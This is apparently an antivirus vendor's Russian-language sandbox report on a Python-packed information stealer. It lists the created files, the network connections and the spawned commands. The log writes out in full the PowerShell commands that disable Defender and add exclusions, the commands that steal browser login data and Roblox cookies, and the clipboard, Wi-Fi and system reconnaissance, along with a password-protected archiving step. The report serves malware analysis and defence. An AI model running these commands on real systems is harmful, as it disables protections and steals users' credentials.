Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enabl...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /F /PID 3596
- '<SYSTEM32>\taskkill.exe' /F /PID 1572
- '<SYSTEM32>\taskkill.exe' /F /PID 984
- '<SYSTEM32>\taskkill.exe' /F /PID 2492
- '<SYSTEM32>\taskkill.exe' /F /PID 4048
- '<SYSTEM32>\taskkill.exe' /F /PID 4352
- '<SYSTEM32>\taskkill.exe' /F /PID 4784
Завершает или пытается завершить
следующие пользовательские процессы:
- iexplore.exe
- firefox.exe
Читает файлы, отвечающие за хранение паролей сторонними программами
- %HOMEPATH%\desktop\aoc_saq_d_v3_merchant.docx
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\february_catalogue__2015.doc
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\ovp25012015.doc
- %LOCALAPPDATA%\microsoft\edge\user data\default\login data
- %LOCALAPPDATA%\microsoft\edge\user data\default\web data
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_mei36962\vcruntime140.dll
- %TEMP%\_mei36962\vcruntime140_1.dll
- %TEMP%\_mei36962\_asyncio.pyd
- %TEMP%\_mei36962\_bz2.pyd
- %TEMP%\_mei36962\_ctypes.pyd
- %TEMP%\_mei36962\_decimal.pyd
- %TEMP%\_mei36962\_hashlib.pyd
- %TEMP%\_mei36962\_lzma.pyd
- %TEMP%\_mei36962\_multiprocessing.pyd
- %TEMP%\_mei36962\_overlapped.pyd
- %TEMP%\_mei36962\_queue.pyd
- %TEMP%\_mei36962\_socket.pyd
- %TEMP%\_mei36962\_sqlite3.pyd
- %TEMP%\_mei36962\_ssl.pyd
- %TEMP%\_mei36962\_wmi.pyd
- %TEMP%\_mei36962\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei36962\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei36962\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei36962\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei36962\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei36962\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei36962\base_library.zip
- %TEMP%\_mei36962\doenerium.aes
- %TEMP%\_mei36962\libcrypto-3.dll
- %TEMP%\_mei36962\libffi-8.dll
- %TEMP%\_mei36962\libssl-3.dll
- %TEMP%\_mei36962\pyexpat.pyd
- %TEMP%\_mei36962\python313.dll
- %TEMP%\_mei36962\rar.exe
- %TEMP%\_mei36962\rarreg.key
- %TEMP%\_mei36962\select.pyd
- %TEMP%\_mei36962\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
- %TEMP%\_mei36962\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
- %TEMP%\_mei36962\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
- %TEMP%\_mei36962\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
- %TEMP%\_mei36962\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
- %TEMP%\_mei36962\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
- %TEMP%\_mei36962\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei36962\sqlite3.dll
- %TEMP%\_mei36962\ucrtbase.dll
- %TEMP%\_mei36962\unicodedata.pyd
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\ .scr
- %TEMP%\ ÐÂ \common files\desktop\508softwareandos.doc
- %TEMP%\ ÐÂ \common files\desktop\aoc_saq_d_v3_merchant.docx
- %TEMP%\ ÐÂ \common files\desktop\february_catalogue__2015.doc
- %TEMP%\ ÐÂ \common files\desktop\issi2013_template_for_posters.docx
- %TEMP%\ ÐÂ \common files\desktop\ovp25012015.doc
- %TEMP%\ ÐÂ \system\antivirus.txt
- %TEMP%\sxieazf0\sxieazf0.0.cs
- %TEMP%\sxieazf0\sxieazf0.cmdline
- %TEMP%\sxieazf0\sxieazf0.out
- %TEMP%\sxieazf0\cscfbc635c96ee04e13beb0f8d9b723e313.tmp
- %TEMP%\resc66d.tmp
- %TEMP%\sxieazf0\sxieazf0.dll
- %TEMP%\ ÐÂ \display (1).png
- %TEMP%\ ÐÂ \directories\desktop.txt
- %TEMP%\ ÐÂ \directories\pictures.txt
- %TEMP%\ ÐÂ \directories\documents.txt
- %TEMP%\ ÐÂ \directories\music.txt
- %TEMP%\ ÐÂ \directories\videos.txt
- %TEMP%\ ÐÂ \directories\downloads.txt
- %TEMP%\ ÐÂ \system\system info.txt
- %TEMP%\ ÐÂ \system\mac addresses.txt
- %TEMP%\ ÐÂ \system\task list.txt
- %TEMP%\x4yub9spli.tmp
- %TEMP%\wrftcr8ttx.tmp
- %TEMP%\iysuzhp7gb.tmp
Удаляет файлы, которые сам же создал
- %TEMP%\resc66d.tmp
- %TEMP%\sxieazf0\cscfbc635c96ee04e13beb0f8d9b723e313.tmp
- %TEMP%\sxieazf0\sxieazf0.out
- %TEMP%\sxieazf0\sxieazf0.0.cs
- %TEMP%\sxieazf0\sxieazf0.dll
- %TEMP%\sxieazf0\sxieazf0.cmdline
- %TEMP%\x4yub9spli.tmp
- %TEMP%\wrftcr8ttx.tmp
- %TEMP%\iysuzhp7gb.tmp
Изменяет файл HOSTS.
Сетевая активность
Подключается к
- 'gs##tic.com':443
- 'mo#####.map.fastly.net':443
TCP
Другие
- 'gs##tic.com':443
UDP
- DNS ASK gs##tic.com
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "tree /A /F" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "netsh wlan show profile" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "systeminfo" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB... (со скрытым окном)
- '<SYSTEM32>\tasklist.exe' /FO LIST
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value
- '<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
- '<SYSTEM32>\tree.com' /A /F
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-Clipboard
- '<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC...
- '<SYSTEM32>\netsh.exe' wlan show profile
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\cmd.exe' /c "attrib -r <DRIVERS>\etc\hosts" (со скрытым окном)
- '<SYSTEM32>\attrib.exe' -r <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c "attrib +r <DRIVERS>\etc\hosts" (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +r <DRIVERS>\etc\hosts
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\sxieazf0\sxieazf0.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC66D.tmp" "%TEMP%\sxieazf0\CSCFBC635C96EE04E13BEB0F8D9B723E313.TMP" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "getmac" (со скрытым окном)
- '<SYSTEM32>\getmac.exe'
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 3596" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 1572" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 984" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 2492" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4048" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4352" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4784" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI36962\rar.exe a -r -hp"123" "%TEMP%\kX5PR.zip" *" (со скрытым окном)
